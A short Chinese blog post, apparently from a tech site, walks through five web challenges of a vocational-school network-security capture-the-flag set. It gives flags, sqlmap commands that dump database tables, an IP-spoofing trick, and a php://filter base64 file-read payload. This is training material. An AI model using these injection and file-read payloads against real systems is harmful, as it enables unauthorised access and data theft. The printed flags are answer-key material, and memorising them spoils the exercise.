PYsystem003 中职网络安全

siwei • 2022-03-19 00:03 • 好物分享

1ip/1

F12被禁用，有两种解法
解法一：进入第二题，F12，

F12不退，换回第一题

解法二：新建网址，查看网页源代码

Flag{fc35fdc70d5fc69d269883a822c7a53e}
2.ip/2

直接sqlmap –u 网址 –forms –dbs

发现mysql数据库
sqlmap -u 网址--forms -D mysql --tables

sqlmap –u 网址 --forms -D mysql -T 'comehere!!!' --dump

3.ip/3

看到这里在后面添加后缀 robots.txt试一试

4.ip/4

本地用户ip：127.0.0.1
抓包

flag{c71b47723409ac75d3e6b28f78b372ce}

5.ip/5

http://172.16.103.250/5/?file=php://filter/read=convert.base64-encode/resource=ind

版权声明：
作者：siwei
链接：https://www.techfm.club/p/25691.html
来源：TechFM
文章版权归作者所有，未经允许请勿转载。

THE END

二维码

工实小报 | P450室外首飞教学

用Rust编写的快如闪电的代码编辑器：lapce

下一篇>>

搜索内容